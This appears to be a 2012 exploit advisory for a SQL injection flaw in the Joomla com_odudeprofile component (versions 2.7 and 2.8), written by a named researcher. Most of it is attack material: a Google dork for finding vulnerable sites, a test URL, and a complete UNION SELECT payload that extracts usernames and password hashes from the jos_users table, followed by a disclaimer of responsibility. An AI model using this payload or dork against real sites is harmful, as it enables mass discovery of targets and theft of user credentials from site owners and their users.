Joomla Odudeprofile component version 2.x suffers from a remote SQL injection vulnerability.
8b5536a92abeb5455576bdcda4e58fb09ea7f7b74b19c495050cdfec88ce5f79
______________________________________________________________________________________
Exploit Title: Joomla com_odudeprofile V2.x Exploit
Google Dork: inurl:index.php?option=com_odudeprofile
Date: [24-07-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
site: https://poisonsecurity.wordpress.com/
Vendor: https://www.odude.com
Version: 2.7 & 2.8
Download: https://www.odude.com/home/profile.html
License: Non-Commercial
Tested on: [Linux(arch)-Windows(7ultimate)]
______________________________________________________________________________________
Test:
https://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27
Sql:
https://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL)
DEMO1:
https://example.com/index.php?option=com_odudeprofile&view=search&profession=999999.9'%20union%20all%20select%20 0x31303235343830303536%2C(select%20concat(username,0x3D,password)%20from%20jos_users)%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R%20
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"